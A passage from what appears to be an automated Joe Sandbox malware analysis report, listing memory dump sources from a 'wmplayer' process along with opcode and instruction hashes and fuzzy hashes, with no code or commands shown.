            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
            • Instruction ID: 6158b953938e4fa65184f0695d7a8c08037a1e0db5d092e0d4ebae9a81823019
            • Opcode Fuzzy Hash: c50324aba8d4f18421088d9a85102b1ea4a1cc003bed18f74713a350aa301588
            • Instruction Fuzzy Hash: 97900231605804169140B29848C4586400697E0301BA5C051E1428558C8B148A5A5362
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
            • Instruction ID: 3d1187d38bc563b7cbd4c17935b5997db336238ece7132160f66065a62b4beee
            • Opcode Fuzzy Hash: ef4ffc9438c59e4dc37354358044a92ac3edc74cc375faf691723a69ea16141c
            • Instruction Fuzzy Hash: 5490022124140C06D140B29884547470007C7D0701FA5C051A1028558D87168A6966B2
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
            • Instruction ID: 9338f67405f70701324fd1e09126289f1dfe839e626e3a3f6d771e9e89661978
            • Opcode Fuzzy Hash: e265b0bba5157aaca3da00da4293b1fc486099655846690ba24350ed6a0e77e8
            • Instruction Fuzzy Hash: 0F90022120184846D140B3984844B4F410687E1302FE5C059A515A558CCA1589595722
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
            • Associated: 00000006.00000002.1377770159.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_3800000_wmplayer.jbxd
            Similarity
            • API ID:
            • String ID: $$@
            • API String ID: 0-1194432280
            • Opcode ID: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
            • Instruction ID: 0c82d0d49e48d688fc46f782253f15b9a9d859c4dd4245f2ce52013bc282fc4c
            • Opcode Fuzzy Hash: 92eb790c79927d514117cfdd601353dc8ead7cecd239b9ee5e06f638073f1e5a
            • Instruction Fuzzy Hash: 3F811976D002699BDB31DF94CC44BEEB6B8AB08710F0445EAE919F7680D7709E84CFA1